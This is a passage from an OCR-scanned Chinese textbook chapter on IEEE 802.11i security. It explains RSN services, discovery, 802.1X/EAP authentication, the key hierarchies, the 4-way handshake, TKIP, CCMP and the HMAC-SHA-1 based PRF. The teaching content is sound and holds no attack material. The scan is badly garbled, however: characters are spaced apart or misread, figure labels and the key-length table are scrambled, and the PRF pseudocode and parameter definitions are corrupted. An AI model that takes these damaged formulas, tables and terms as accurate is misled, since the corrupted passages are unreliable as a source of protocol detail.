e 访问 控制 服务 : 访问 控制 服务 强制 要 求 使 用 认证 功能 ， 提 供 消 息 路 由 ， 协 助 密 钥 交 换 。 
这 一 服务 可 以 与 各 种 认证 协议 配合 工作 。 

e 消息 完整 性 加 密 服务 : 将 MAC 层 数据 和 消息 完整 性 编码 一 起 加 密 ， 确 保 数据 没有 被 
修改 过 。 

图 24-6a 展示 了 用 于 支持 以 上 服务 的 安全 协议 ， 图 24-6b 列举 了 所 用 的 密码 学 算法 。 


24.4.2 IEEE 802.11i 的 操作 阶段 


IEEE 802.11i RSN 的 操作 可 以 分 为 5 个 阶段 。 这 些 阶 段 的 具体 操作 与 网 络 配置 和 通信 双方 
终端 有 关 。 其 可 能 的 情况 包括 以 下 4 种 (参见 图 24-5 ): 

1. 两 个 无 线 工 作 站 在 同一 个 基本 服务 集 内 经 由 接 人 点 进行 通信 。 

2. 两 个 无 线 工 作 站 在 ad hoc 独立 基本 服务 集 内 直接 进行 通信 。 

3. 两 个 无 线 工作 站 在 不 同 的 基本 服务 集中 经 由 各 自 的 接 人 点 和 分 发 系统 进行 通信 。 

4. 一 个 无 线 工 作 站 与 一 个 有 线 网 络 中 的 终端 经 由 接 人 点 和 分 发 系统 进行 通信 。 

IEEE 802.11i 协议 中 的 安全 仅 与 工作 站 和 对 应 接 人 点 的 安全 通信 有 关 。 在 情况 1 中 ， 若 每 
个 工作 站 都 与 接 人 点 创建 安全 通信 ， 则 整个 通信 是 安全 的 。 情 况 2 与 情况 1 类 似 ， 工 作 站 中 包 
含 了 接 人 点 的 功能 。 在 情况 3 中 ，IEEE 802.11 标准 仅 提 供 基 本 服务 集 内 的 安全 通信 ， 不 负责 
分 发 系统 中 的 安全 通信 。 端 到 端的 安全 必须 由 上 层 提供 。 类 似 地 ， 在 情况 4 中 ，IEEE 802.11i 
确保 工作 站 和 接 人 点 之 间 的 通信 安全 。 

出 于 这 些 考 虑 ， 图 24-7 描述 了 RSN 的 5 个 操作 阶段 ， 并 将 其 对 应 到 相应 的 网 络 组 件 下 。 
一 个 新 的 组 件 是 认证 服务 器 (AS)， 长 方形 条 代表 MPDU 序列 的 一 次 数据 交换 。5 个 阶段 的 具 
体 定 义 如 下 : 
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强健 的 安全 网 络 (RSN ) 


er 





a) 服务 与 协议 
强健 的 安全 网 络 (RSN ) 





b) 密码 学 算法 


CBC-MAC 王 密码 分 组 链接 -消息 认证 码 

CCM 二 计数 器 模式 密码 分 组 链接 -消息 认证 码 
CCMP 王 计数 器 模式 密码 分 组 链接 -消息 认证 码 协议 
TKIP== 临 时 密 钥 完整 性 协议 


图 24-6 IEEE 802.11i 标准 要 素 749 


源 工作 站 BAR 认证 服务 器 目的 工作 站 





图 24-7 IEEE 802.111 操作 流程 
o RM: 接 人 点 使 用 信 标 (Beacon) 和 探测 响应 (Probe Response) 消息 来 通知 其 所 遵循 
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的 IEEE 802.11 安全 策略 ， 工 作 站 依据 这 一 消息 来 验证 即将 通信 的 接 人 和 人 点。 工作站 与 
接 人 点 建立 关联 ， 并 根据 信 标 和 探测 响应 所 提供 的 信息 选择 加 密 套 件 和 认证 机 制 。 

o 认证 : 在 这 一 阶段 ， 工 作 站 和 认证 服务 器 相互 进行 身份 认证 。 认 证 事务 成 功 之 后 ， 接 
人 点 才 人 允许 工作 站 和 认证 服务 器 进行 其 他 数据 通信 。 接 人 点 不 参与 认证 过 程 ， 仅 负责 
工作 站 和 认证 服务 器 之 间 的 消息 转发 。 

e FARE: 接 人 点 和 工作 站 要 执行 若干 操作 来 完成 密 钥 的 生成 和 放置 。 此 阶段 中 帧 序 
列 仅 在 接 人 点 和 工作 站 之 间 传 输 。 

o 保护 数据 传输 : 这 一 阶段 的 帧 序列 经 由 接 人 点 在 源 工 作 站 和 目的 工作 站 之 间 传 输 。 
图 24-7 中 的 条 形 深 灰 色 阴 影 和 加 密 模块 图 标 表明 ， 安 全 数据 传输 仅 发 生 在 工作 站 和 接 
人 点 之 间 ， 并 不 保证 两 个 工作 站 之 间 的 安全 传输 。 

o 连接 终止 : 这 一 阶段 接 人 点 和 工作 站 交换 帧 序列 ， 撤 销 安全 连接 ， 连 接 恢 复原 始 状 态 。 


24.4.3 发现 阶段 


我 们 首先 从 发 现 阶段 (如 图 24-8 所 示 项 端的 部 分 ) 开始 ,来 了 解 更 多 有 关 RSN 操作 流程 
的 具体 内 容 。 这 一 阶段 的 目的 是 完成 工作 站 与 接 入 点 的 相互 识别 ， 在 安全 功能 上 达成 一 致 并 基 
于 这 些 安全 功能 为 之 后 的 通信 创建 一 个 关联 。 


工作 站 

















工 ŽA 

iii 接 人 点 发 送 可 能 的 
安全 选项 ( 每 个 安全 
策略 的 安全 功能 ) 


工作 站 发 送 认 证 请 求 


接 人 点 执行 认证 
工作 站 发 送 带 有 安全 
选项 的 关联 请 求 
接 人 点 发 送 关 联 
工作 站 选择 安全 选项 安全 选项 
802.1X 控 制 端口 阻塞 


802.1x EAP 请 求 
802.1x EAP 响 应 


ee 


扩展 认证 协议 (EAP) 交换 


接受 /EAP 成 功 
密 钥 


















802.1x EAP 成 功 
| 
802.1X 控 制 端口 阻塞 


图 24-8 IEEE 802.11i 操作 流程 : 发 现 ， 认 证 ， 关 联 
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安全 功能 “在 发 现 阶 段 ， 工 作 站 和 接 人 点 就 下 面 几 个 方面 的 具体 技术 做 出 协商 : 

© 用 以 保护 单 播 流 量 机 密 性 和 MPDU 完整 性 的 协议 (流量 仅 在 工作 站 和 接 入 点 之 间 )。 

© 认证 方法 。 

e 密码 学 密 钥 管理 方式 。 

保护 多 播 / 单 播 流量 的 机 密 性 和 完整 性 协议 由 接 人 点 支配 ， 同 在 一 个 多 播 组 内 的 所 有 工作 
站 必须 使 用 相同 的 协议 和 密码 。 协 议和 所 选 密 钥 长 度 (如 果 可 变 ) 一 起 被 称 作 密码 套件 。 机 密 
性 和 完整 性 密码 套件 的 选项 有 : 

© WEP， 密 钥 长 度 为 40 位 或 104 位 ， 并 人 允许 与 旧 的 IEEE 802.11 实现 向 后 兼容 。 

© TKIP, 

® CCMP。 

© 厂商 特定 (Vendor-specific) 的 方法 。 

另 一 个 协商 套件 是 认证 和 密 钥 管 理 套件 ( AKM)， 其 定义 了 : (1) 接 人 点 和 工作 站 的 相互 
认证 方式 ; (2) 从 其 他 密 钥 中 提取 root 密 钥 的 方式 。 可 能 的 AKM 套件 有 : 

© IEEE 802.1X。 

e 预先 共享 的 密 钥 (没有 明确 的 认证 过 程 ， 相 互 的 认证 基于 STA 和 AP 间 共 享 的 唯一 的 

密 钥 )。 

e 厂商 特定 的 方法 。 

MPDU 交换 发 现 阶 段 包含 三 个 数据 交换 过 程 。 

e 网 络 和 安全 功能 发 现 : 这 一 交换 过 程 中 ， 工 作 站 (STA) 发 现 网 络 的 存在 。 接 入 点 要 
么 通过 信和 标 帧 在 特定 信道 周期 地 广播 其 安全 功能 ， 其 中 安全 功能 由 RSNIE (Robust 
Security Network Information Elements) 显示 ; 要 么 通过 探测 响应 帧 响应 工作 站 的 请 求 。 
一 个 无 线 工作 站 可 以 通过 被 动 监听 信 标 帧 或 是 主动 发 送 请 求 来 发 现 可 用 的 接 入 点 和 合 
适 的 安全 功能 。 
开放 系统 认证 : 这 一 帧 序列 交换 过 程 不 确保 安全 ， 只 是 保证 对 IEEE 802.11 硬件 实现 的 
状态 机 的 向 后 兼容 。 实 际 上 工作 站 和 接 人 点 交换 的 是 身份 标识 符 。 
KE: 这 一 过 程 的 目的 是 在 安全 功能 上 达成 一 致 。 工 作 站 向 接 人 点 发 送 关联 请 求 帧 ， 
在 该 帧 中 ， 工 作 站 指定 了 由 接 人 点 提供 的 一 套 匹配 的 安全 功能 (一 个 认证 和 密 钥 管理 
套件 、 一 对 密码 套件 、 一 个 对 偶 密 钥 套件 )。 如 果 工 作 站 和 接 人 点 之 间 没 有 匹配 的 安全 
功能 ， 接 人 点 将 拒绝 工作 站 的 关联 请 求 。 如 果 接 人 点 是 假冒 的 ， 或 者 有 攻击 者 在 信道 
内 插 人 非法 帧 序列 ， 工 作 站 也 会 将 其 屏蔽 。 正 如 图 24-8 中 所 示 ，IEEE 802.1X 控制 端 
口 被 阻塞 ， 没 有 用 户 流量 可 以 通过 。 阻 塞 端口 的 概念 将 在 下 文中 解释 。 


24.4.4 ”认证 阶段 


上 文中 提 到 ， 认 证 阶段 中 工作 站 (STA) 和 位 于 分 发 系统 (DS) 中 的 认证 服务 器 进行 相互 
认证 。 实 现 认证 的 目的 是 使 得 仅 有 已 认证 的 工作 站 才 被 允许 连接 到 网 络 ， 为 工作 站 提供 安全 
保证 。 

IEEE 802.1X 访问 控制 方法 IEEE 802.11i 使 用 另 一 个 标准 来 提供 局 域 网 访问 控制 功能 ， 
这 就 是 IEEE 802.1X 一 一 基于 端口 的 网 络 访问 控制 ( Port-Based Network Access Control) 。 标 准 
定义 的 认证 协议 是 扩展 认证 协议 (Extensible Authentication Protocol, EAP). IEEE 802.1X 中 的 
术语 包括 请 求 者 、 认 证 者 、 认 证 服务 器 。 在 802.11 无 线 局 域 网 环境 中 ， 前 两 个 术语 对 应 无 线 
工作 站 和 接 人 点 。 认 证 服务 器 可 以 是 网 络 有 线 端 的 分 离 设 备 ( 即 通过 DS 访问 )， 也 可 以 直接 位 
于 认证 者 中 。 


534 RGD MÈS 


在 认证 服务 器 通过 认证 协议 认证 一 个 请 求 者 之 前 ， 认 证 者 仅仅 在 该 请 求 者 和 认证 服务 器 之 
间 传 输 控 制 和 认证 消息 。 此 时 802.1X 控制 信道 被 解除 阻塞 ， 而 802.11 数据 信道 被 阻塞 。 一 旦 
请 求 者 通过 认证 并 获取 密 钥 ， 认 证 者 就 会 转发 请 求 者 的 数据 ， 并 且 要 求 数据 满足 预定 义 的 访问 
控制 限制 ， 此 时 数据 信道 才 被 解除 阻塞 。 

如 图 24-9 所 示 ，802.1X 使 用 了 控制 端口 和 非 控 制 端口 的 概念 ， 端 口 是 定义 在 认证 者 中 的 
逻辑 实体 ， 其 关系 到 物理 网 络 连接 。 在 一 个 无 线 局 域 网 中 ， 认 证 者 ( 接 人 点 ) 可 能 有 两 个 物理 
端口 : 一 个 用 于 连接 到 分 发 系统 ， 另 一 个 用 于 基本 服务 集 内 的 无 线 连 接 。 每 一 个 逻辑 端口 会 映 
射 到 其 中 一 个 物理 端口 。 不 管 请 求 者 的 认证 状态 如 何 ， 非 控制 端口 都 允许 请 求 者 与 其 他 认证 服 
务 器 之 间 的 PDU 交换 。 仅 当 请 求 者 的 状态 为 已 获取 认证 时 ， 控 制 端口 才 允 许 请 求 者 和 其 他 系 - 
统 之 间 的 PDU 交换 。 

具备 上 层 认证 协议 的 802.1X 架构 恰好 符合 具有 若干 无 线 工 作 站 和 一 个 接 人 点 的 基本 服务 
集 架 构 。 然 而 对 于 没有 接 人 点 的 独立 基本 服务 集 (IBSS)，802.11i 提供 了 更 加 复杂 的 解决 方案 ， 


其 中 涉及 工作 站 之 间 的 对 偶 认证 。 
非 控制 端口 认证 服务 器 
e 


工作 站 
控制 端口 控制 端口 
到 基本 服务 集中 的 。 _。 o> BRR 


其 他 无 线 工作 站 
24-9 802.1X 访问 控制 


MPDU 交换 “图 24-8 中 下 方 部 分 展示 了 IEEE 802.11 认证 阶段 的 MPDU 交换 。 我 们 可 以 
把 认证 阶段 分 为 如 下 三 个 子 过 程 : 
© 连接 到 认证 服务 器 (AS): 工作 站 向 接 人 点 发 送 连接 到 认证 服务 器 的 请 求 。 接 人 点 接收 
请 求 ， 并 向 认证 服务 器 发 送 访问 请 求 。 
o 扩展 认证 协议 (EAP) 交换 : 这 一 交换 将 进行 工作 站 和 服务 器 间 的 双方 认证 。 还 可 以 有 
一 些 可 选 的 交换 ， 下 文 将 会 提 到 。 
安全 密 钥 分 发 : 一 旦 认证 成 立 ， 认 证 服务 器 会 产生 一 个 主 会 话 密 钥 (MSK) (也 被 称 作 
认证 - 授权 -核算 (AAA) 密 钥 ) 并 将 其 发 送 到 工作 站 。 所 有 的 用 于 安全 通信 的 密码 
学 密 钥 都 依据 MSK 产生 ，IEEE 802.11i 并 没有 指定 安全 传输 MSK 的 方法 ， 而 是 将 这 
个 任务 交 由 EAP 负责 。 不 管 使 用 何 种 方法 ， 都 需要 将 含有 加 密 过 的 MSK 的 MPDU 从 
认证 服务 器 (AS) 经 由 接 人 点 (AP) 传 给 工作 站 (STA). 
EAP 交换 正如 上 文 所 说 ， 有 一 些 可 能 的 EAP 交换 可 用 于 认证 阶段 。 一 般 情况 下 ， 工 作 
站 和 接 入 点 之 间 的 消息 流 使 用 基于 局 域 网 的 扩展 认证 协议 (EAPOL)， 接 和 人 点 和 认证 服务 器 之 
间 的 消息 流 使 用 远程 认证 拨 人 验证 服务 ( Remote Authentication Dial In User Service, RADIUS) 
协议 ， 此 外 还 有 一 些 其 他 可 选 的 工作 站 - 接 人 点 间 交 换 和 接 人 点 -认证 服务 器 间 交 换 。 
[FRANO7] 总 结 了 以 下 使 用 EAPOL 和 RADIUS 的 认证 交换 步骤 : 
754 1. EAP 交换 始 于 接 人 点 向 工作 站 发 送 EAP- 请 求 /认证 帧 (EAP-Request/Identity frame), 
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2. 工作 站 将 EAP- 响应 /认证 帧 (EAP-Response/Identity frame) 发 回 到 接 人 点 的 非 控 制 端 。 
数据 包 由 EAP 被 封装 到 RADIUS， 以 一 个 RADIUS-Access-Request 包 的 形式 传送 到 RADIUS 
服务 器 。 

3. AAA 服务 器 回复 RADIUS-Access-Challenge 包 ， 作 为 EAP 请 求 发 给 工作 站 。 这 是 一 种 
认证 类 型 的 请 求 ， 包 含 相 关 的 挑战 信息 。 

4. 工 作 站 构造 一 个 EAP 响应 消息 并 将 其 发 送 给 认证 服务 器 。 认 证 服务 器 将 响应 翻译 成 
RADIUS-Access-Request， 而 EAP 响应 消息 中 的 挑战 信息 作为 其 数据 段 。 根 据 所 用 EAP 方法 
的 不 同 ， 第 3 步 和 第 4 步 可 能 重复 多 次 。 对 于 TLS 隧道 方法 来 说 ,一 般 需 要 重复 10 到 20 轮 。 

5. AAA 服务 器 发 送 RADIUS-Access-Accept 包 来 进行 授权 。 接 人 点 发 出 EAP 成 功 ( EAP- 
Success) 帧 。( 一 些 协议 要 求 在 TLS 隧道 中 确认 EAP ROW.) 随后 接 人 点 的 控制 端口 被 授 
权 ， 工 作 站 可 以 访问 网 络 。 

从 图 24-8 可 以 看 到 ， 尽 管 认 证 成 功 了 ， 但 接 人 点 的 控制 端口 仍然 是 阻塞 的 。 直 到 完成 4 
次 握手 后 ， 临 时 密 钥 配置 到 工作 站 和 接 入 点 时 ， 接 入 点 的 控制 端口 才 会 开放 。 


24.4.5” 密 钥 管 理 阶段 


在 密 钥 管理 阶段 将 会 生成 多 种 密码 学 密 钥 ， 并 分 发 到 各 工作 站 。 密 钥 可 以 分 为 两 种 类 型 ; 
对 偶 密 钥 ， 用 于 工作 站 和 接 人 点 之 间 通 信 ; 组 密 钥 ， 用 于 多 播 通信 。 参 考 [FRANO7], 图 24-10 
展示 了 两 类 密 钥 的 层次 结构 。 表 24-3 分 别 定 义 了 各 个 密 钥 。 


带 外 通信 EAP 方 法 通信 
sx AAAK 或 M F 


GMK (由 认证 
服务 器 生成 ) 和 





40 位 , 104 位 〈WEP) 







128 位 《CCMP) 基于 策略 的 改变 
256f% (TKIP) CHER. Mi 
384 位 (CCMP) 认证 ) 
5124% (TKIP) 
KCK 
128 位 = 128 位 ， 时 一 1284% (CCMP) F 
WA 256 位 (TKIP) 
这 些 密 铀 是 PTK 的 组 件 
a) 对 侦 密 钥 层 次 结构 b) 组 密 钥 层次 结构 


图 24-10 IEEE 802.11i 密 钥 层 次 结构 
= 24-3 IEEE 802.11i Se 









| 描述 /目的 | 
EES 核算 、 和 _ 用 在 IEEE 802. mE 956 
授权 密 钥 证 、 密 钥 管理 方式 中 。 和 MMSK 相同 
ROSSA 在 预 分 享 密 钥 环境 下 成 为 PMK ae 


HAERA | ” 同 其 他 输入 一 起 用 于 获取 PTK 
LEN A— IEF BR OTK 





密 钥 生 成 密 钥 、 
REA 


密 铀 管理 密 钥 、 
REA 


密 钥 生成 密 钥 
密 钥 生成 密 钥 
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源 于 PMK。 由 EAPOL-KCK, EAPOL- | 512 (TKIP) 
对 偶 临时 密 钥 KEK, TK 和 MIC-key (作为 TKIP) 组 成 
临时 密 钥 同 TKIP 或 CCMP 一 起 提供 单 播 用 户 流 | 256 (TKIP) 
量 的 机 密 性 和 完整 性 保护 128 (CCMP) 
256 (TKIP) 
组 临时 密 钥 BON ea a 播 /广播 用 户 流量 128 (CCMP) 
20 40 104 (WEP) 
消息 完整 性 编 | TKIP Michael MIC 使 用 的 ， 用 于 提供 消 
码 密 钥 息 完整 性 保护 
EAPOL 密 钥 | 为 4 次 握手 阶段 的 密 钥 材 料 分 发 提供 完 198 
验证 密 钥 整 性 保护 
EAPOL 密 钥 | 在 4 次 握手 中 为 保证 GTK 和 其 他 密 钥 128 
加 密 密 钥 材料 提供 机 密 性 
e icii 用 在 有 线 等 效 加 密 中 


对 偶 密 钥 ”对偶 密 钥 用 于 一 对 设备 之 间 的 通信 ， 特 别 是 在 工作 站 和 接 入 点 之 间 。 这 些 密 钥 
构成 了 层次 关系 ， 其 他 密 钥 依据 主 密 钥 动态 生成 ， 临 时 使 用 一 段 时 间 。 
对 偶 密 钥 层次 结构 的 顶层 有 两 种 密 钥 : 预 分 享 密 钥 (PSK) 和 主 会 话 密 钥 (MSK)。 预 分 享 
A (PSK) 是 被 接 人 点 和 工作 站 分 享 的 密 钥 ， 并 不 在 IEEE 802.11i 的 范围 之 中 。 主 会 话 密 钥 
(MSK) 也 即 前 述 的 认证 - 授权 - 核算 密 钥 ( AAAK)， 在 认证 阶段 由 IEEE 802.1X 协议 生成 。 
密 钥 生成 的 实际 方法 依赖 于 所 使 用 的 认证 协议 。 不 管 是 PSK 还 是 MSK， 接 人 点 和 与 之 通信 的 
工作 站 都 会 共享 一 个 唯一 的 密 钥 。 这 样 在 任 一 时 刻 ， 每 个 工作 站 都 有 一 个 密 钥 集 ， 而 接 人 点 对 
于 每 个 工作 站 都 有 一 个 密 钥 集 。 
对 偶 主 密 钥 (PMK) 源 自 于 主 密 钥 ， 若 使 用 PSK， 则 将 PMK 用 作 PSK; 若 使 用 MSK， 则 
PMK 是 由 MSK 截取 而 来 的 。 在 认证 阶段 结束 时 ， 如 图 24-8 中 802.1x EAP 成 功 消息 所 示 ， 接 
入 点 和 工作 站 都 有 一 份 共享 的 PMK。 
对 偶 临 时 密 钥 (PTK) 由 PMK 产生 而 来 ， 它 包含 了 三 种 用 于 在 工作 站 和 接 人 点 之 间 认 证 
之 后 相互 通信 的 密 钥 。PTK 密 钥 的 生成 需要 用 PMK、 工 作 站 和 接 入 点 的 MAC 地 址 以 及 随机 
数 计算 HMAC-SHA-1 摘要 函数 。 使 用 工作 站 和 接 入 点 地 址 来 生成 PTK 能 够 抵抗 会 话 支持 和 假 
冒 ， 随 机 数 提供 了 附加 的 随机 密 钥 材料 。 
PTK 的 三 个 部 分 如 下 所 示 : 
e 基于 局 域 网 的 扩展 认证 协议 (EAPOL) 密 钥 认证 密 钥 (EAPOL-KCK): 支持 在 RSN 安 
装 期 间 工作 站 和 接 人 点 控制 帧 的 机 密 性 和 数据 可 靠 性 。 同 时 还 提供 PMK 所 有 权证 明 功 
能 ， 通 过 一 个 认证 实体 来 认证 对 PMK 的 所 有 权 。 

e EAPOL 密 钥 加 密 密 钥 (EAPOL-KEK): 保护 RSN 关联 过 程 中 密 钥 和 其 他 数据 的 机 
密 性 。 

e 临时 密 钥 : 提供 对 用 户 流 量 的 真正 保护 。 

组 密 钥 ”组 密 钥 用 于 一 个 工作 站 发 送 MPDU 给 多 个 工作 站 时 的 多 播 传输 。 组 密 钥 层次 结 
构 的 顶层 是 组 主 密 钥 (GMK)。GMK 是 一 种 用 于 生成 密 钥 的 密 钥 ， 和 其 他 输入 配合 产生 组 临 
时 密 钥 (GTK)。 和 PTK 由 接 人 点 和 工作 站 生成 所 不 同 的 是 ，GTK 由 接 人 点 和 与 之 关联 的 多 个 
工作 站 生成 。IEEE 802.11i 没有 定义 准确 的 GTK 生成 方法 ， 但 是 要 求 GTK 的 值 具备 伪 随 机 性 。 








名 R 


消息 完整 性 密 钥 
EAPOL-KCK 消息 完整 性 密 钥 


流量 密 钥 /加 密 
EAPOL-KEK 密 钥 
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GTK 的 安全 分 发 使 用 已 创建 的 对 偶 密 钥 ， 设 备 每 次 离开 网 络 时 密 钥 都 会 改变 。 

对 偶 密 钥 的 分 发 ”图 24-11 上 半 部 分 展示 了 对 偶 密 钥 分 发 过 程 的 MPDU 交换 ， 称 作 4 次 
握手 。 工 作 站 和 接 人 点 使 用 4 次 握手 来 确认 PMK 的 存在 ， 验 证 所 选 的 加 密 套 件 ， 为 下 一 步 数 
据 会 话 获 得 新 生成 的 PTK。 交 换 过 程 可 以 分 为 如 下 4 步 : 

e 接 入 点 一 工作 站 : 消息 包含 接 人 点 的 MAC 地 址 和 一 个 随机 值 (Anonce)。 

e 工作 站 一 接 入 点 : 工作 站 也 产生 一 个 自己 的 随机 值 ( Snonce)。 使 用 双方 MAC 地 址 、 
两 个 随机 值 和 PMK 来 生成 PTK。 工 作 站 随后 将 包含 MAC 地 址 和 Snonce 的 信息 发 送 
给 接 入 点 ， 接 入 点 以 此 可 以 生成 同样 的 PTK。 这 条 消息 中 含有 一 个 使 用 HMAC-MD5 
或 者 HMAC-SHA-1-128 摘要 算法 的 消息 完整 性 编码 (MIC), 算法 使 用 的 密 钥 是 KCK. 

o 接 入 点 一 工作 站 : 上 一 步 完成 后 ， 接 人 点 生成 了 PTK， 然 后 发 送 一 条 消息 给 工作 站 ， 
内 容 和 第 一 条 消息 基本 一 致 ， 还 附带 MIC. 

e 工作 站 一 接 入 点 : 工作 站 发 送 确认 消息 ， 同 样 附带 MIC。 


工作 站 接 人 点 












消息 1 
EAPOL 密 钥 ( Anonce, 单 播 ) 消 息 1 传送 随机 值 到 工作 站 
使 其 生成 PTK 


消息 2 
EAPOL (Snonce, 
单 播 , MIC ) 





消息 3 
EAPOL 密 钥 ( 安装 PTK， 







单 播 , MIC ) 消息 3 向 工作 站 表明 认证 者 在 
线 ， 确 保 PTK 是 最 新 的 且 没有 中 
消息 4 是 对 消息 3 的 确认 ， 不 消息 4 间 人 攻击 者 
具有 密码 学 功能 ， 确 保 组 密 铀 | EAPOL 密 钥 ( 单 播 , MIC) 


握手 过 程 的 可 靠 开始 






EAPOL $ (GTK, MIC ) 


消息 1 分 发 一 个 新 的 GTK 给 工 


工作 站 解密 并 安装 GTK 作 站 。GTK 被 加 密 且 由 MIC 保 证 
消息 2 完整 性 
消息 2 分 发 到 接 人 点 ， EAPOL 密 钥 (MIC ) 
该 帧 仅 作为 对 接 人 点 的 接 人 点 安装 GTK 


响应 


图 24-11 IEEE 802.11i 操作 流程 : 4 次 握手 和 组 密 钥 握手 


组 密 钥 的 分 发 ” 接 人 点 生成 GTK， 将 其 分 发 到 多 播 组 的 每 一 个 工作 站 。 针 对 每 个 工作 站 
的 交换 都 包含 如 下 两 步 : 


e 接 入 点 一 工作 站 : 接 人 点 发 送 的 消息 内 容 为 GTK， 使 用 RC4 或 者 AES 加 密 ， 所 用 密 
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钥 为 KEK。 消 息 中 附带 MIC. 
o 工作 站 一 接 入 点 : 工作 站 发 回 对 GTK 的 确认 响应 ， 消 息 中 仍 附带 MIC. 


24.4.6 ”保护 数据 传输 阶段 


IEEE 802.11i 定 义 了 两 种 保护 802.11 MPDU 数据 传输 的 方案 : 临时 密 钥 完整 性 协议 
( Temporal Key Integrity Protocol, TKIP) 和 计数 器 模式 密码 块 链 消息 完整 码 协议 (Counter 
Mode-CBC MAC Protocol, CCMP). 
TKIP IHASFCAR P2477 38 WEP (Wired Equivalent Privacy) 仅 需 要 软件 改变 就 可 以 实现 
TKIP。TKIP 提供 了 两 种 服务 : 
e 消息 完整 性 : TKIP 在 802.11 MAC 帧 中 数据 字段 后 添加 消息 完整 性 编码 。MIC 由 一 个 
名 为 Michael 的 算法 生成 ， 使 用 源 MAC 地 址 、 目 的 MAC 地 址 、 数 据 字 段 和 密 钥 材 料 
作为 输入 来 计算 一 个 64 位 的 摘要 值 。 
e 数据 机 密 性 : 用 RC4 算法 加 密 MPDU 和 MIC. 
256 R TK (如 图 24-10 所 示 ) 按 如 下 方式 使 用 ， 其 前 128 位 被 截断 成 两 个 64 位 密 钥 ， 
用 于 Michael 消息 摘要 算法 生成 消息 完整 性 编码 MIC， 一 个 密 钥 用 于 保护 工作 站 到 接 人 点 的 消 
息 ， 另 一 个 密 钥 用 于 保护 接 和 人 点 到 工作 站 的 消息 。 剩 余 128 位 用 于 生成 RC4 加 密 密 钥 。 
作为 附加 保护 ， 为 每 个 帧 分 配 一 个 单调 递增 TKIP 序列 计数 器 (TSC)。TSC 有 两 个 目的 ， 
其 一 是 每 个 MPDU 都 含有 一 个 TSC， 且 被 MIC 保护 ， 从 而 防止 消息 受到 重 放 攻 击 ; 另 一 个 目 
的 是 和 会 话 TK 联合 在 一 起 产生 动态 加 密 密 钥 ， 每 一 次 传输 MPDU 时 密 钥 动态 改变 ， 从 而 使 
密码 破译 更 加 困难 。 
CCMP CCMP 用 在 新 的 能 够 支持 这 一 方案 的 IEEE 802.11 设备 上 。 和 TKIP 一 样 ，CCMP 
提供 两 个 服务 
e 消息 完整 性 : CCMP 使 用 密码 分 组 链接 消息 认证 编码 (CBC-MAC)。 该 编码 在 本 书 第 
12 章 介绍 过 。 
e 数据 机 密 性 : CCMP 使 用 CTR 组 密码 模型 配合 AES 来 加 密 。CTR 在 本 书 第 20 章 介 
绍 过 。 
CCMP 的 完整 性 和 机 密 性 保证 使 用 相同 的 128 位 AES 密 钥 。 该 方案 使 用 48 位 的 包 编码 构 
造 一 个 随机 值 来 避免 重 放 攻击 。 


24.4.7 IEEE 802.11i 伪 随机 函数 


Æ IEEE 802.11i 方 案 的 很 多 地 方 需要 用 到 伪 随 机 函数 (PRF)。 例 如 ， 生 成 随机 值 ， 扩 展 对 
偶 密 钥 和 生成 GTK 等 。 最 好 的 安全 实践 是 不 同 的 伪 随 机 数 流 用 于 不 同 的 目的 。 然 而 实现 效率 
依赖 于 单个 伪 随 机 数 生成 函数 。 

PRF 基于 HMAC-SHA-1 摘要 函数 生成 的 伪 随 机 比特 流 。HMAC-SHA-1 使 用 一 个 消息 和 
一 个 长 度 至 少 为 160 位 的 密 钥 来 产生 一 个 160 位 的 散 列 值 。SHA-1 有 一 个 属性 ， 即 输入 数据 改 
变 1 位 就 会 生成 一 个 全 新 的 散 列 值 ， 这 一 性 质 是 伪 随 机 数 函 数 的 基础 。 

IEEE 802.11i PRF 以 4 个 参数 作为 输入 ， 产 生 一 定数 量 的 随机 比特 。 函 数 的 原型 为 PRE(K, 
A,B, Len)， 其 输入 参数 的 含义 分 别 如 下 : 

KK== 秘 密 密 钥 

4== 应 用 程序 特定 的 字符 串 ( 如 随机 值 生成 、 对 偶 密 钥 扩 展 ) 

B= 针对 特定 情况 的 数据 

Zen 一 伪 随机 比特 的 预期 长 度 
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例如 ， 对 于 CCMP 所 用 的 对 偶 临 时 密 钥 来 说 ， 

PTK = PRF(PMK, “Pairwise key expansion” , min(AP-Addr, STA-Addr)||max (AP-Addr, STA- 
Addr)||min(Anonce, Snonce)||max(Anonce, Snonce), 384) 

对 于 这 种 情况 ， 输 入 参数 的 含义 如 下 : 

K=PMK 

A= “Pairwise key expansion” 

B= 将 双方 MAC 地 址 和 随机 值 连接 起 来 生成 的 字 节 序 列 

Len = 384 位 

类 似 地 ， 一 个 随机 值 (nonce) 可 以 用 如 下 方法 产生 : 


Nonce = PRF(Random Number,"Init Counter", MAC || Time, 256) 


其 中 ，Time 是 随机 数 生 成 器 已 知 的 网 络 时 间 的 测量 值 。 组 临时 密 钥 可 由 如 下 公式 生成 : 
GTK=PRF(GMK, “Group key expanse” , MAC||Gnonce, 256) 


图 24-12 对 函数 PRE(K, A, B, Len) 进行 了 说 明 ， 参 数 
天 用 于 HMAC 的 密 钥 输 入 。 消 息 的 输入 由 参数 4、 一 个 全 
0 字 节 、 参 数 B、 一 个 计数 器 i 连接 而 成 。 计 数 器 的 初始 
值 为 0。HMAC 算法 执行 一 次 生成 一 个 160 位 的 散 列 值 。 
如 果 需 要 更 多 的 随机 值 ， 就 让 计数 器 i 自 增 ， 用 同样 的 输 
入 再 执行 HMAC， 直 到 生成 足够 的 位 数 为 止 。 函 数 的 逻辑 
可 以 表示 为 : 

PRF(K, A, B, Len) 

R e null string 

for i e 0 to ((Len + 159)/160 - 1) do 


R < R||HMAC-SHA-1(K, All| 0|| || i) 
Return Truncate-to-Len(R, Len) 


24.5 ”推荐 读物 


[SOUP12] 很 好 地 概述 了 移动 设备 面临 的 威胁 和 应 对 | 
措施 。 [BECH11] 是 一 个 有 用 的 智能 手机 安全 问题 分 析 图 24-12 IEEE 802.11i BELAZ 
方法 。 

[STAL14b] 中 包含 了 IEEE 802.11 和 Wi-Fi 规范 的 细节 内 容 。[FRAN07] 对 IEEE 802.11i Hp 
议 进行 了 准确 细致 的 介绍 。[CHEN05] 提供 了 IEEE 802.11i 的 概述 。 





R=HMAC-SHA-1(K, A||0||B\lé) 
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246 ”关键 术语 、 复 习题 和 习题 


关键 术语 
4-way handshake ( 4 次 握手 ) MAC service data unit (MSDU, MAC 服务 数据 
access point (AP， 接 人 点 ) 单元 ) 


basic service set (BSS， 基 本 服务 集 ) 


message integrity code (MIC， 消 息 完整 性 编码 ) 


Counter Mode-CBC MAC Protocol (CCMP, 计数 器 pairwise keys (对 偶 密 钥 ) 


